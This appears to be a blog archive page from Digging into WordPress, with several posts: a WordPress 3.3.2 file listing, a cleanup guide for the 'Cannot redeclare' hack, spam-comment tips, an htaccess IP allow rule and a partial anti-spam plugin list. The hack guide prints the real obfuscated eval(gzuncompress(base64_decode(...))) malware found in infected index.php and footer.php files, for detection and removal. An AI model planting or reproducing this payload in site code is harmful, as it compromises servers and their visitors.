The official Codex page lists some important files, but only for WP version 2.x and doesn’t seem to list files located in all sub-directories. Sure it’s not the most exciting topic in the world, but it’s always good practice to know thy files. You get to see the bigger picture and gain a better understanding of how much stuff actually is included in WordPress — especially if you start digging around in the /wp-includes/ directory.. bring a snack, knife, and some flint to improve your chances.

We’re looking at default download/unzip of WordPress version 3.3.2 — a complete list of all files in all directories in alphabetical order. Here’s the roadmap:

• directory structure (without files)
• WordPress root-level files
• files in the /wp-admin/ directory
• files in the /wp-content/ directory
• files in the /wp-includes/ directory

Basic WordPress directory structure

/wordpress/

	/wp-admin/
		/css/
		/images/
		/includes/
		/js/
		/maint/
		/network/
		/user/

	/wp-content/
		/plugins/
			/akismet/
		/themes/
			/twentyeleven/
				/colors/
				/images/
				/inc/
					/images/
				/js/
				/languages/
			/twentyten/
				/images/
					/headers/
				/languages/
	
	/wp-includes/
		/Text/
		/css/
		/images/
			/crystal/
			/smilies/
			/wlw/
		/js/
			/crop/
			/imgareaselect/
			/jcrop/
			/jquery/
				/ui/
			/plupload/
			/scriptaculous/
			/swfupload/
				/plugins/
			/thickbox/
			/tinymce/
				/langs/
				/plugins/
					/directionality/
					/fullscreen/
					/inlinepopups/
						/skins/
							/clearlooks2/
								/img/
					/media/
						/css/
						/js/
					/paste/
						/js/
					/spellchecker/
						/classes/
							/utils/
						/css/
						/img/
						/includes/
					/tabfocus/
					/wordpress/
						/css/
						/img/
					/wpdialogs/
						/js/
					/wpeditimage/
						/css/
						/img/
						/js/
					/wpfullscreen/
					/wpgallery/
						/img/
					/wplink/
				/themes/
					/advanced/
						/img/
						/js/
						/skins/
							/default/
								/img/
							/highcontrast/
							/o2k7/
								/img/
							/wp_theme/
								/img/
				/utils/
		/pomo/
		/theme-compat/

Root-level WordPress files

/wordpress/
	index.php
	license.txt
	readme.html
	wp-activate.php
	wp-app.php
	wp-blog-header.php
	wp-comments-post.php
	wp-config-sample.php
	wp-cron.php
	wp-links-opml.php
	wp-load.php
	wp-login.php
	wp-mail.php
	wp-pass.php
	wp-register.php
	wp-settings.php
	wp-signup.php
	wp-trackback.php
	xmlrpc.php

Files in the /wp-admin/ directory

/wp-admin/
	about.php
	admin-ajax.php
	admin-footer.php
	admin-functions.php
	admin-header.php
	admin-post.php
	admin.php
	async-upload.php
	comment.php
	credits.php
	/css/
		colors-classic.css
		colors-classic.dev.css
		colors-fresh.css
		colors-fresh.dev.css
		farbtastic.css
		file-list.txt
		ie-rtl.css
		ie-rtl.dev.css
		ie.css
		ie.dev.css
		install.css
		install.dev.css
		media-rtl.css
		media-rtl.dev.css
		media.css
		media.dev.css
		wp-admin-rtl.css
		wp-admin-rtl.dev.css
		wp-admin.css
		wp-admin.dev.css
	custom-background.php
	custom-header.php
	edit-comments.php
	edit-form-advanced.php
	edit-form-comment.php
	edit-link-form.php
	edit-tag-form.php
	edit-tags.php
	edit.php
	export.php
	freedoms.php
	gears-manifest.php
	/images/
		align-center.png
		align-left.png
		align-none.png
		align-right.png
		archive-link.png
		arrows-dark-vs.png
		arrows-dark.png
		arrows-vs.png
		arrows.png
		blue-grad.png
		bubble_bg-rtl.gif
		bubble_bg.gif
		button-grad-active.png
		button-grad.png
		comment-grey-bubble.png
		date-button.gif
		ed-bg-vs.gif
		ed-bg.gif
		fade-butt.png
		fav-arrow-rtl.gif
		fav-arrow.gif
		fav-vs.png
		fav.png
		generic.png
		gray-grad.png
		gray-star.png
		icons32-vs.png
		icons32.png
		imgedit-icons.png
		list.png
		loading-publish.gif
		loading.gif
		logo-ghost.png
		logo-login.png
		logo.gif
		marker.png
		mask.png
		media-button-image.gif
		media-button-music.gif
		media-button-other.gif
		media-button-video.gif
		media-button.png
		menu-arrow-frame-rtl.png
		menu-arrow-frame.png
		menu-arrows.gif
		menu-bits-rtl-vs.gif
		menu-bits-rtl.gif
		menu-bits-vs.gif
		menu-bits.gif
		menu-dark-rtl-vs.gif
		menu-dark-rtl.gif
		menu-dark-vs.gif
		menu-dark.gif
		menu-shadow-rtl.png
		menu-shadow.png
		menu-vs.png
		menu.png
		no.png
		press-this.png
		required.gif
		resize-rtl.gif
		resize.gif
		screen-options-toggle-vs.gif
		screen-options-toggle.gif
		screenshots
		se.png
		sort.gif
		star.png
		toggle-arrow-rtl.gif
		toggle-arrow.gif
		upload-classic.png
		upload-fresh.png
		wheel.png
		white-grad-active.png
		white-grad.png
		widgets-arrow-vs.gif
		widgets-arrow.gif
		wordpress-logo.png
		wp-badge.png
		wp-logo-vs.png
		wp-logo.png
		wpspin_dark.gif
		wpspin_light.gif
		xit.gif
		yes.png
	import.php
	/includes/
		admin.php
		bookmark.php
		class-ftp-pure.php
		class-ftp-sockets.php
		class-ftp.php
		class-pclzip.php
		class-wp-comments-list-table.php
		class-wp-filesystem-base.php
		class-wp-filesystem-direct.php
		class-wp-filesystem-ftpext.php
		class-wp-filesystem-ftpsockets.php
		class-wp-filesystem-ssh2.php
		class-wp-importer.php
		class-wp-links-list-table.php
		class-wp-list-table.php
		class-wp-media-list-table.php
		class-wp-ms-sites-list-table.php
		class-wp-ms-themes-list-table.php
		class-wp-ms-users-list-table.php
		class-wp-plugin-install-list-table.php
		class-wp-plugins-list-table.php
		class-wp-posts-list-table.php
		class-wp-terms-list-table.php
		class-wp-theme-install-list-table.php
		class-wp-themes-list-table.php
		class-wp-upgrader.php
		class-wp-users-list-table.php
		comment.php
		continents-cities.php
		dashboard.php
		deprecated.php
		export.php
		file.php
		image-edit.php
		image.php
		import.php
		list-table.php
		manifest.php
		media.php
		menu.php
		meta-boxes.php
		misc.php
		ms-deprecated.php
		ms.php
		nav-menu.php
		plugin-install.php
		plugin.php
		post.php
		schema.php
		screen.php
		taxonomy.php
		template.php
		theme-install.php
		theme.php
		update-core.php
		update.php
		upgrade.php
		user.php
		widgets.php
	index-extra.php
	index.php
	install-helper.php
	install.php
	/js/
		cat.dev.js
		cat.js
		categories.dev.js
		categories.js
		comment.dev.js
		comment.js
		common.dev.js
		common.js
		custom-background.dev.js
		custom-background.js
		custom-fields.dev.js
		custom-fields.js
		dashboard.dev.js
		dashboard.js
		edit-comments.dev.js
		edit-comments.js
		editor.dev.js
		editor.js
		farbtastic.js
		gallery.dev.js
		gallery.js
		image-edit.dev.js
		image-edit.js
		inline-edit-post.dev.js
		inline-edit-post.js
		inline-edit-tax.dev.js
		inline-edit-tax.js
		link.dev.js
		link.js
		media-upload.dev.js
		media-upload.js
		media.dev.js
		media.js
		nav-menu.dev.js
		nav-menu.js
		password-strength-meter.dev.js
		password-strength-meter.js
		plugin-install.dev.js
		plugin-install.js
		post.dev.js
		post.js
		postbox.dev.js
		postbox.js
		revisions-js.php
		set-post-thumbnail.dev.js
		set-post-thumbnail.js
		tags.dev.js
		tags.js
		theme-preview.dev.js
		theme-preview.js
		theme.dev.js
		theme.js
		user-profile.dev.js
		user-profile.js
		utils.dev.js
		utils.js
		widgets.dev.js
		widgets.js
		word-count.dev.js
		word-count.js
		wp-fullscreen.dev.js
		wp-fullscreen.js
		xfn.dev.js
		xfn.js
	link-add.php
	link-manager.php
	link-parse-opml.php
	link.php
	load-scripts.php
	load-styles.php
	/maint/
		repair.php
	media-new.php
	media-upload.php
	media.php
	menu-header.php
	menu.php
	moderation.php
	ms-admin.php
	ms-delete-site.php
	ms-edit.php
	ms-options.php
	ms-sites.php
	ms-themes.php
	ms-upgrade-network.php
	ms-users.php
	my-sites.php
	nav-menus.php
	/network/
		admin.php
		edit.php
		index-extra.php
		index.php
		menu.php
		plugin-editor.php
		plugin-install.php
		plugins.php
		profile.php
		settings.php
		setup.php
		site-info.php
		site-new.php
		site-settings.php
		site-themes.php
		site-users.php
		sites.php
		theme-editor.php
		theme-install.php
		themes.php
		update-core.php
		update.php
		upgrade.php
		user-edit.php
		user-new.php
		users.php
	network.php
	options-discussion.php
	options-general.php
	options-head.php
	options-media.php
	options-permalink.php
	options-privacy.php
	options-reading.php
	options-writing.php
	options.php
	plugin-editor.php
	plugin-install.php
	plugins.php
	post-new.php
	post.php
	press-this.php
	profile.php
	revision.php
	setup-config.php
	theme-editor.php
	theme-install.php
	themes.php
	tools.php
	update-core.php
	update.php
	upgrade-functions.php
	upgrade.php
	upload.php
	/user/
		admin.php
		index-extra.php
		index.php
		menu.php
		profile.php
		user-edit.php
	user-edit.php
	user-new.php
	users.php
	widgets.php

Files in the /wp-content/ directory

/wp-content/
	index.php
	/plugins/
		/akismet/
			admin.php
			akismet.css
			akismet.gif
			akismet.js
			akismet.php
			legacy.php
			readme.txt
			widget.php
		hello.php
		index.php
	/themes/
		index.php
		/twentyeleven/
			404.php
			archive.php
			author.php
			category.php
			/colors/
				dark.css
			comments.php
			content-aside.php
			content-featured.php
			content-gallery.php
			content-image.php
			content-intro.php
			content-link.php
			content-page.php
			content-quote.php
			content-single.php
			content-status.php
			content.php
			editor-style-rtl.css
			editor-style.css
			footer.php
			functions.php
			header.php
			image.php
			/images/
				comment-arrow-bypostauthor-dark-rtl.png
				comment-arrow-bypostauthor-dark.png
				comment-arrow-bypostauthor-rtl.png
				comment-arrow-bypostauthor.png
				comment-arrow-dark-rtl.png
				comment-arrow-dark.png
				comment-arrow-rtl.png
				comment-arrow.png
				comment-bubble-dark-rtl.png
				comment-bubble-dark.png
				comment-bubble-rtl.png
				comment-bubble.png
				headers
				search.png
				wordpress.png
			/inc/
				/images/
					content-sidebar.png
					content.png
					dark.png
					light.png
					sidebar-content.png
				theme-options.css
				theme-options.js
				theme-options.php
				widgets.php
			index.php
			/js/
				html5.js
				showcase.js
			/languages/
				twentyeleven.pot
			license.txt
			page.php
			readme.txt
			rtl.css
			screenshot.png
			search.php
			searchform.php
			showcase.php
			sidebar-footer.php
			sidebar-page.php
			sidebar.php
			single.php
			style.css
			tag.php
		/twentyten/
			404.php
			archive.php
			attachment.php
			author.php
			category.php
			comments.php
			editor-style-rtl.css
			editor-style.css
			footer.php
			functions.php
			header.php
			/images/
				/headers/
					berries-thumbnail.jpg
					berries.jpg
					cherryblossoms-thumbnail.jpg
					cherryblossoms.jpg
					concave-thumbnail.jpg
					concave.jpg
					fern-thumbnail.jpg
					fern.jpg
					forestfloor-thumbnail.jpg
					forestfloor.jpg
					inkwell-thumbnail.jpg
					inkwell.jpg
					path-thumbnail.jpg
					path.jpg
					sunset-thumbnail.jpg
					sunset.jpg
				wordpress.png
			index.php
			/languages/
				twentyten.pot
			license.txt
			loop-attachment.php
			loop-page.php
			loop-single.php
			loop.php
			onecolumn-page.php
			page.php
			rtl.css
			screenshot.png
			search.php
			sidebar-footer.php
			sidebar.php
			single.php
			style.css
			tag.php

Files in the /wp-includes/ directory

/wp-includes/
	/Text/
		Diff
		Diff.php
	admin-bar.php
	atomlib.php
	author-template.php
	bookmark-template.php
	bookmark.php
	cache.php
	canonical.php
	capabilities.php
	category-template.php
	category.php
	class-IXR.php
	class-feed.php
	class-http.php
	class-json.php
	class-oembed.php
	class-phpass.php
	class-phpmailer.php
	class-pop3.php
	class-simplepie.php
	class-smtp.php
	class-snoopy.php
	class-wp-admin-bar.php
	class-wp-ajax-response.php
	class-wp-editor.php
	class-wp-error.php
	class-wp-http-ixr-client.php
	class-wp-walker.php
	class-wp-xmlrpc-server.php
	class-wp.php
	class.wp-dependencies.php
	class.wp-scripts.php
	class.wp-styles.php
	comment-template.php
	comment.php
	compat.php
	cron.php
	/css/
		admin-bar-rtl.css
		admin-bar-rtl.dev.css
		admin-bar.css
		admin-bar.dev.css
		editor-buttons.css
		editor-buttons.dev.css
		jquery-ui-dialog.css
		jquery-ui-dialog.dev.css
		wp-pointer.css
		wp-pointer.dev.css
	default-constants.php
	default-filters.php
	default-widgets.php
	deprecated.php
	feed-atom-comments.php
	feed-atom.php
	feed-rdf.php
	feed-rss.php
	feed-rss2-comments.php
	feed-rss2.php
	feed.php
	formatting.php
	functions.php
	functions.wp-scripts.php
	functions.wp-styles.php
	general-template.php
	http.php
	/images/
		admin-bar-sprite.png
		arrow-pointer-blue.png
		blank.gif
		/crystal/
			archive.png
			audio.png
			code.png
			default.png
			document.png
			interactive.png
			license.txt
			spreadsheet.png
			text.png
			video.png
		down_arrow.gif
		icon-pointer-flag.png
		rss.png
		/smilies/
			icon_arrow.gif
			icon_biggrin.gif
			icon_confused.gif
			icon_cool.gif
			icon_cry.gif
			icon_eek.gif
			icon_evil.gif
			icon_exclaim.gif
			icon_idea.gif
			icon_lol.gif
			icon_mad.gif
			icon_mrgreen.gif
			icon_neutral.gif
			icon_question.gif
			icon_razz.gif
			icon_redface.gif
			icon_rolleyes.gif
			icon_sad.gif
			icon_smile.gif
			icon_surprised.gif
			icon_twisted.gif
			icon_wink.gif
		toggle-arrow.png
		upload.png
		/wlw/
			wp-comments.png
			wp-icon.png
			wp-watermark.png
		wpicons.png
		wpmini-blue.png
		xit.gif
	/js/
		admin-bar.dev.js
		admin-bar.js
		autosave.dev.js
		autosave.js
		colorpicker.dev.js
		colorpicker.js
		comment-reply.dev.js
		comment-reply.js
		/crop/
			cropper.css
			cropper.js
			marqueeHoriz.gif
			marqueeVert.gif
		hoverIntent.dev.js
		hoverIntent.js
		/imgareaselect/
			border-anim-h.gif
			border-anim-v.gif
			imgareaselect.css
			jquery.imgareaselect.dev.js
			jquery.imgareaselect.js
		/jcrop/
			Jcrop.gif
			jquery.Jcrop.css
			jquery.Jcrop.dev.js
			jquery.Jcrop.js
		/jquery/
			jquery.color.dev.js
			jquery.color.js
			jquery.form.dev.js
			jquery.form.js
			jquery.hotkeys.dev.js
			jquery.hotkeys.js
			jquery.js
			jquery.query.js
			jquery.schedule.js
			jquery.serialize-object.js
			jquery.table-hotkeys.dev.js
			jquery.table-hotkeys.js
			suggest.dev.js
			suggest.js
			/ui/
				jquery.effects.blind.min.js
				jquery.effects.bounce.min.js
				jquery.effects.clip.min.js
				jquery.effects.core.min.js
				jquery.effects.drop.min.js
				jquery.effects.explode.min.js
				jquery.effects.fade.min.js
				jquery.effects.fold.min.js
				jquery.effects.highlight.min.js
				jquery.effects.pulsate.min.js
				jquery.effects.scale.min.js
				jquery.effects.shake.min.js
				jquery.effects.slide.min.js
				jquery.effects.transfer.min.js
				jquery.ui.accordion.min.js
				jquery.ui.autocomplete.min.js
				jquery.ui.button.min.js
				jquery.ui.core.min.js
				jquery.ui.datepicker.min.js
				jquery.ui.dialog.min.js
				jquery.ui.draggable.min.js
				jquery.ui.droppable.min.js
				jquery.ui.mouse.min.js
				jquery.ui.position.min.js
				jquery.ui.progressbar.min.js
				jquery.ui.resizable.min.js
				jquery.ui.selectable.min.js
				jquery.ui.slider.min.js
				jquery.ui.sortable.min.js
				jquery.ui.tabs.min.js
				jquery.ui.widget.min.js
		json2.dev.js
		json2.js
		/plupload/
			changelog.txt
			handlers.dev.js
			handlers.js
			license.txt
			plupload.flash.js
			plupload.flash.swf
			plupload.html4.js
			plupload.html5.js
			plupload.js
			plupload.silverlight.js
			plupload.silverlight.xap
		prototype.js
		quicktags.dev.js
		quicktags.js
		/scriptaculous/
			MIT-LICENSE
			builder.js
			controls.js
			dragdrop.js
			effects.js
			scriptaculous.js
			slider.js
			sound.js
			unittest.js
			wp-scriptaculous.js
		swfobject.js
		/swfupload/
			handlers.dev.js
			handlers.js
			license.txt
			/plugins/
				swfupload.cookies.js
				swfupload.queue.js
				swfupload.speed.js
				swfupload.swfobject.js
			swfupload-all.js
			swfupload.js
			swfupload.swf
		/thickbox/
			loadingAnimation.gif
			macFFBgHack.png
			tb-close.png
			thickbox.css
			thickbox.js
		/tinymce/
			/langs/
				wp-langs-en.js
				wp-langs.php
			license.txt
			/plugins/
				/directionality/
					editor_plugin.js
				/fullscreen/
					editor_plugin.js
					fullscreen.htm
				/inlinepopups/
					editor_plugin.js
					/skins/
						/clearlooks2/
							/img/
								alert.gif
								button.gif
								buttons.gif
								confirm.gif
								corners.gif
								drag.gif
								horizontal.gif
								vertical.gif
							window.css
					template.htm
				/media/
					/css/
						media.css
					editor_plugin.js
					/js/
						embed.js
						media.js
					media.htm
					moxieplayer.swf
				/paste/
					blank.htm
					editor_plugin.js
					/js/
						pastetext.js
						pasteword.js
					pastetext.htm
					pasteword.htm
				/spellchecker/
					changelog.txt
					/classes/
						EnchantSpell.php
						GoogleSpell.php
						PSpell.php
						PSpellShell.php
						SpellChecker.php
						/utils/
							JSON.php
							Logger.php
					config.php
					/css/
						content.css
					editor_plugin.js
					/img/
						wline.gif
					/includes/
						general.php
					rpc.php
				/tabfocus/
					editor_plugin.js
				/wordpress/
					/css/
						content.css
					editor_plugin.dev.js
					editor_plugin.js
					/img/
						audio.gif
						embedded.png
						image.gif
						media.gif
						more_bug.gif
						page.gif
						page_bug.gif
						trans.gif
						video.gif
				/wpdialogs/
					editor_plugin.dev.js
					editor_plugin.js
					/js/
						popup.dev.js
						popup.js
						wpdialog.dev.js
						wpdialog.js
				/wpeditimage/
					/css/
						editimage-rtl.css
						editimage.css
					editimage.html
					editor_plugin.dev.js
					editor_plugin.js
					/img/
						delete.png
						image.png
					/js/
						editimage.dev.js
						editimage.js
				/wpfullscreen/
					editor_plugin.js
					fullscreen.htm
				/wpgallery/
					editor_plugin.dev.js
					editor_plugin.js
					/img/
						delete.png
						edit.png
						gallery.png
						t.gif
				/wplink/
					editor_plugin.dev.js
					editor_plugin.js
			/themes/
				/advanced/
					about.htm
					anchor.htm
					charmap.htm
					color_picker.htm
					editor_template.js
					image.htm
					/img/
						colorpicker.jpg
						flash.gif
						gotmoxie.png
						icons.gif
						iframe.gif
						pagebreak.gif
						quicktime.gif
						realmedia.gif
						shockwave.gif
						trans.gif
						video.gif
						windowsmedia.gif
					/js/
						about.js
						anchor.js
						charmap.js
						color_picker.js
						image.js
						link.js
						source_editor.js
					link.htm
					shortcuts.htm
					/skins/
						/default/
							content.css
							dialog.css
							/img/
								buttons.png
								items.gif
								menu_arrow.gif
								menu_check.gif
								progress.gif
								tabs.gif
							ui.css
						/highcontrast/
							content.css
							dialog.css
							ui.css
						/o2k7/
							content.css
							dialog.css
							/img/
								button_bg.png
								button_bg_black.png
								button_bg_silver.png
							ui.css
							ui_black.css
							ui_silver.css
						/wp_theme/
							content.css
							dialog.css
							/img/
								tabs.gif
							ui.css
					source_editor.htm
			tiny_mce.js
			tiny_mce_popup.js
			/utils/
				editable_selects.js
				form_utils.js
				mctabs.js
				validate.js
			wp-mce-help.php
			wp-tinymce.js.gz
			wp-tinymce.php
		tw-sack.dev.js
		tw-sack.js
		wp-ajax-response.dev.js
		wp-ajax-response.js
		wp-list-revisions.dev.js
		wp-list-revisions.js
		wp-lists.dev.js
		wp-lists.js
		wp-pointer.dev.js
		wp-pointer.js
		wplink.dev.js
		wplink.js
	kses.php
	l10n.php
	link-template.php
	load.php
	locale.php
	media.php
	meta.php
	ms-blogs.php
	ms-default-constants.php
	ms-default-filters.php
	ms-deprecated.php
	ms-files.php
	ms-functions.php
	ms-load.php
	ms-settings.php
	nav-menu-template.php
	nav-menu.php
	pluggable-deprecated.php
	pluggable.php
	plugin.php
	/pomo/
		entry.php
		mo.php
		po.php
		streams.php
		translations.php
	post-template.php
	post-thumbnail-template.php
	post.php
	query.php
	registration-functions.php
	registration.php
	rewrite.php
	rss-functions.php
	rss.php
	script-loader.php
	shortcodes.php
	taxonomy.php
	template-loader.php
	/theme-compat/
		comments-popup.php
		comments.php
		footer.php
		header.php
		sidebar.php
	theme.php
	update.php
	user.php
	vars.php
	version.php
	widgets.php
	wlwmanifest.xml
	wp-db.php
	wp-diff.php

© 2012 Digging into WordPress | Permalink | 25 comments | Add to del.icio.us | Post tags: files, reference

Checking for the “Cannot redeclare” hack

The good news is that the hack is easy to diagnose. Just open any page from your site and look for the following PHP error message:

Fatal error: Cannot redeclare _765258526() 
(previously declared in /path/to/www/wp-content/themes/THEME/footer.php(12) 
: eval()'d code:1) in /path/to/www/index.php(18) 
: eval()'d code on line 1

PHP errors like this are usually located at the bottom of the web page, but may appear elsewhere or even not all in some cases (i.e., proper configuration). To be certain, scan your server’s PHP error logs for the “Cannot redeclare” error string. If you find anything that matches, it’s time to fix your site..

About the “Cannot redeclare” hack

If your site’s been hit with “Cannot redeclare”, you’re in for a wild clean-up party because it infects every index.php and footer.php file for every WordPress site on the server.

For example, my client hosted 11 sites on the same shared account, so multiply that by the number of index and footer files used by WordPress (core files and themes) and you get over 200 hacked files to clean up. Needless to say the client’s sites have been moved to a more secure location.

Fortunately finding the hacked index files is relatively painless, just search all files on your server for the following phrase:

eval(gzun

Here is a screenshot showing search results for this phrase:

As seen here, the hacked files should be easy to recognize because they:

• include the eval(gzun search term
• include long strings of encoded gibberish
• consist of index.php and footer.php files

If your search turns up anything that similar but not quite what we’re talking about here, it may or may not be legit. The main thing that we’re looking for are the long strings of encoded nonsense. Also, remember to check all sites that you may have on the same server. Once you’ve isolated the infected files, it’s time to clean ‘em up..

Removing the “Cannot redeclare” hack

Looking at any of the hacked files, you’ll find this hideous looking piece of code garbage:

<?php eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyNDG2NDc3MLGMV4+1dSwqSqzU0LQGAJCPCMM=')));  eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OINzczNTK1MDUy01DJ1KxWSbR1LCpKrNTQtC5KLSktylNISixONTOJT0lNzk9J1VBJjFbJjNW0rgUAqDUUxQ==')));  eval(gzuncompress(base64_decode('eF6VlMmyo0YURPeO8D94192hhQokhBSOXhSjmAoVVYDQxoGYJzFKAr7ez257Ya/6/UDevHkyMnmF9ddsfT6itumGZBy/3sMxOez/iJOojZOvXxKFo1GazvHOBGLA+eUaLVZpzajUZhTU15L3GFPsjAFRPMEAFudWy/H371++ffv2+2+//pL8xAHTODKmOT6slbE1tOJ1kiCDyoCxphgvMRm9qgExefekX133El0ismOkqGKP42MZLpKJpPMS8YTx4gSYVTsZZGe4IDdMec9Y+/pC3J1NwcNz5cbyxsZi7uQpYBHw88T+MPqTTulClndJI2Dx+I1owCJqXi0kAiGDr1PmpH+r/aTW/2IFVglZi6osknzT22+Yfz8mcjvS0l0L96TTiLuQ2MMek2IXbPSj2KrAO+ddAXvjWLWGHMfuyQrhhdkqAvz+CT+ojEYjqyB0rlslDwURXHJ71jw323da2R40mRpdS4G7wsjZXqfQjIck2hxOHc/bz77v+puTkrDPFsMoxgdVLn5dNCpjnotZMiFZKLX3LSu/xWPgnXXxxd2UgOtMuStvykbQOS04ZZINfXx9sg9l5G6GtgVvWJSG0uT8cr4x+pmL+C29MFouyy5VgBmk9WCjtJIuBwvaskyLo/De1BNIvYk6O/3liRUSN4tenILmuXaHUeqGNR7ouqyfyIb+1agxALuPZs5o1dYP9iuzSthDwkcnZgxky0cQ63OW8ELrc0LllmTOu7k3emSFNcicuCO11t2flxdnl3QngmRY8ipQ5yJo5i6sb69zN06yOgr1ja6SUyJPRVYU123gNYPkwhyM6zP7/hmmDAXA/GCKt2SMs9rXRPOUifjEuvCkhqLQ52ZxkHutKdrzZvO4+yIcdsdp/z5uwlMT7sqre/Bjns096xq4ppgfSHNomHt645A8tnLo1wPeKjUWwzM6Fy6801J9qwOWfUExd9U2eVAOZElU3Vc+2pdeJGosX+U022iZa0nW/LCIQLZPbjs0Rac9tmGfK+oW7k1LsaGMWZvsxuV9LSZ3/CDdQqpA6oCMr7F+OQDN42VrNztRLVGmOi9TZL02hmort/2iyAtvpWu7CtvHXihvbeyNn8nuv6vEBwCVFjuWGDCepDPG7JO788/0Obhcsd2DeRlXYhQvsSfZsjOV63USOcMk1bTUSCPFbCNq6xTUaK1OOuMJeqnc9RL5YMhciGs39OFn+PImRQj/d0cSdpLw+uFztQLmWu4BWyAXinlxV53ppnZdr6p5H9bhoKtpsK/1p2o8c7fu3ZZtENnLjisrS95ya6iLlxQIWqoLA1ELfAUFbpnNu2GfmFa1E5Lu+YrCNimZ6OyxMGmHhWwRwSIv9dFR9ryN1h02Q8pmGjVsNrsdOMNpBat/t0oYvWgkq/vhjiWxSxuuow+lR+virP659Lri9uDEEdZeK0HFT0Ig/8jlTymmN/I='))); ?>

Disgusting stuff, and if you don’t see it at first, that doesn’t mean it’s not there. The scumbags who deal in this filth are clever enough to indent the code so it appears off-screen (via horizontal scrollbar). It’s a clever trick, but most text editors have a limit to the number of characters that appear on each line, so the super-long string of encoded gibberish wraps and becomes easy to spot:

Notice it there in the last line.. it’s like that for all teh files. And again, if you don’t see anything then look for it off-screen. Once you find it, delete it. Then repeat for all index and footer files on your server. Once you’ve done that the “Cannot redeclare” hack should be gone, but you should take steps to prevent future attacks..

Securing your WordPress site

For public websites, there is no such thing as perfect security. There are many ways to improve security, however, including finding a more secure host for your sites. In general, private or some sort of virtual private hosting is better than shared hosting (for many reasons), but it’s also more expensive. Hosting is one of those things where you get what you pay for.. so if you have the means, upgrading to a better, more secure host is the first thing I would consider.

Beyond switching hosts, there are a number of known effective measures you can take to improve the security of your site. There are many excellent resources available to help with site security (both for WordPress and in general), including an entire Lynda.com video/screencast series that focuses in-depth on devloping secure WordPress sites. Even more recently is Daniel Pataki’s Smashing WP article on securing your WordPress website. And if you want to hear it direct from the horse’s mouth, check out the good ‘ol fashioned WP Codex for info on hardening WordPress.

More help..

There’s currently not a lot of info on the “Cannot redeclare” hack, but this WP Forum thread provides some additional clues. If you have any information regarding this hack, or how it relates to the TimThumb hack, please leave a comment to share the information with others in the WP community. Thanks.

© 2011 Digging into WordPress | Permalink | 16 comments | Add to del.icio.us | Post tags: hacking, PHP, Security

Know thy comments

In WordPress, there are three types of responses: comments, pingbacks, and trackbacks. The status of any given response is either:

• approved – appearing on your site
• spammed – flagged as spam
• moderated – on hold for review
• in the trash – marked for deletion

Theoretically, you’re going to know about approved comments that appear on your site. Likewise, you’ll have a chance to review any moderated comments, and nothing makes it to the trash by accident, so you know about those as well. What you don’t always know about are spam comments flagged as such by a plugin. Some of these are going to be ham, and they can be tricky to spot, especially as the number of spam comments begins to climb.

Out of the box

Out of the box, WordPress doesn’t flag any response as spam, unless you add some phrases to the built-in comment blacklist. Then, any comments matching any phrases in your blacklist are sent to the spam pile. So the key to preventing blacklist ham (mmmm..) is being absolutely sure that you want nothing to do with any comments mentioning “baby uggs” or who knows what.

Akismet & ham stats

It’s easy to stop spam without plugins, but activate Akismet and suddenly you’ve got greater accuracy, better automation, and some incredible-looking statistics. Here are Akismet stats for false positives during the last few months here at DigWP.com:

That’s good news, but don’t be fooled – the number of false positives also depends on you, the user. Seeing few false positives is good news if you’re actively looking for them, otherwise who knows how many ham comments have slipped through. We check for false positives fairly regularly, so the low numbers are great, as is the decreasing number of spam comments:

This is also a good sign, but it’s still smart to keep an eye on things and rescue as much ham as possible. Back in the day, I really got into analyzing teh spam – digging through the spam bin, looking for patterns, checking sources, and rescuing ham comments from the abyss. It’s fun if you have the time, but these days it’s better to just get it done..

Ham-rescue tips

Now that we’ve seen how it works, here are some clues for cleaving through large slabs of spam quickly and effectively..

• Comment text – legit comments tend to look real and stand out among the junk
• Gravatars – usually a good signal of quality, but spammers can haz gravatars too
• Link text – stupid link text is a huge giveaway, like “Baby Ugg Boots” or whatever
• Site URL – anything more than a domain or first-level subdirectory is probably spam
• Excessive links – legitimate comments rarely contain more than one or two links

Here’s a screenshot illustrating some of these aspects of spam. Of course, there are plenty more examples waiting for you in Ye Olde Spam Bin!

Gravatars really stand out, but aren’t always the ham you’re looking for

Those are the big giveaways, but it’s generally easier/quicker to scan for ham than spam. That is, rather than looking for evidence of spam, scan for signs of legitimacy and quality. So a good example would be scanning for gravatars – you’re not trying to find the grey mystery man icon, you’re looking for something original, like the flag icon in the previous screenshot. With some repetition, the visual clues sort of gel together and the ham just sort of jumps out at you as sift through the pile.

Wrapping it up..

So what did we learn? Spam is the bad stuff, ham is the good stuff. WordPress doesn’t flag anything as spam by itself unless you add phrases to the comment blacklist. Add a great anti-spam plugin such as Akismet to the mix, and you’ve made your life easier by automating the process. But if you care about your readers and their feedback, you should periodically scan through your spam comments and rescue any false positives. With some repetition, checking your spam and saving ham comments takes only a few minutes, improves the quality of your site, and keeps commentators happy and ready for more.

© 2011 Digging into WordPress | Permalink | 5 comments | Add to del.icio.us | Post tags: comments, spam, tips, tricks

They key here is that only you and the server need access to the folder that you want to protect, so for example, stuff like:

• uploads
• upgrade
• backups
• cache-123
• temp-123
• etc..

Anything that regular users aren’t going to need to access. Then, you’ll also need the IP address of your server and your own machine. Once you have that information, use it to edit the following code:

Order Deny,Allow
Deny from all
Allow from 123.456.789.0
Allow from 0.123.456.789

You can emulate the “Allow from” lines to allow more IP addresses. Like maybe you’ve got a remote office or something. Once the code is ready, just copy and paste into an htaccess file located in the directory you would like to protect. Fix it and forget it, as they say..

I use this code on several sites and it works great. Only takes a minute to setup, and greatly improves the security of otherwise potentially vulnerable directories.

© 2011 Digging into WordPress | Permalink | 18 comments | Add to del.icio.us | Post tags: htaccess, Security, tips, tricks

Akismet

The best anti-spam plugin for WordPress. Bundled with WordPress, Akismet requires a registration key, but is easy to setup and provides excellent “set-it-and-forget-it” spam protection for WordPress.

bcSpamBlock

JavaScript-based anti-spam plugin that uses JavaScript to filter out spam quietly and discretely. Users without JavaScript must prove their legitimacy via copy-&-paste CAPTCHA exercise.

Comment Spam Stopper

Blue Anvil’s anti-spam plugin is CAPTCHA-based and includes JavaScript validation to ensure that required fields in the comment form have been populated with data. To save time, the CAPTCHA field is not displayed when logged into Admin.

Comment Spam Trap

Delivers a double death blow by adding a hidden spam field and an identical but required CAPTCHA field. This simple logic tricks mortal spam bots into revealing themselves and getting blocked. Also blocks trackback spam and optionally sends email notifications of anything it blocks.

Cookies for Comments

